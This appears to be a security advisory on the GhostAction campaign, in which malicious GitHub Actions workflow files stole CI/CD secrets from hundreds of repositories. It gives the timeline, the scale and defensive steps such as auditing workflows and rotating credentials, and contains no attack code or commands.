GhostAction Supply Chain Attack – Developers and Security Teams at Risk

Secrets Stolen, Projects Exposed
A new large-scale supply chain attack, dubbed GhostAction, is targeting GitHub repositories through malicious workflow files disguised as automation scripts. This campaign has already compromised over 817 repositories, stealing more than 3,000+ secrets including GitHub, DockerHub, npm, and PyPI credentials.

Timeline of Events

• September 2, 2025 – A suspicious workflow file was committed to the Fast UUID project, containing code to exfiltrate CI/CD secrets.
• September 5, 2025 – Researchers confirmed the compromise; PyPI tokens were stolen, and the repository was locked to prevent further abuse.
• Following Days – Investigation uncovered a broader GhostAction campaign impacting hundreds of developers and repositories across multiple languages and ecosystems.

The Scale of Compromise

GhostAction is one of the largest workflow compromises ever uncovered on GitHub. Investigators confirmed that:

• 327 developers were directly impacted, many of whom maintain widely used libraries.
• 817   repositories were tampered with, spanning Python, JavaScript, Rust, and Go.
• Over 3,325  secrets were exfiltrated, including GitHub, DockerHub, npm, and PyPI tokens.

This scale means the compromise extends beyond individual projects. It poses a systemic risk to the software supply chain:

• A single poisoned package could cascade into thousands of downstream applications.
• Cloud environments and databases linked to stolen tokens have already seen intrusion attempts.
• Entire SDK portfolios for some companies were affected, magnifying potential business impact.

Who Should Be Concerned?

• Developers & Maintainers – Your GitHub Actions workflows may have been tampered with.
• DevOps Teams – Compromised CI/CD tokens put your automation pipelines and deployments at risk.
• Engineering     Leaders – Stolen credentials open doors to package poisoning, data theft, and intrusion into cloud environments.

What You Need To Do Now

1. Audit workflows – Review GitHub Actions and other CI/CD workflows for unauthorized or suspicious changes.
2. Rotate credentials immediately – Replace all npm, PyPI, DockerHub, and GitHub tokens in case of exposure.
3. Apply GitGuardian’s IOCs – Compare workflow names, commit messages, and server indicators to your environment.
4. Strengthen  monitoring – Implement continuous monitoring of repositories and pipelines for unusual commits or automation scripts.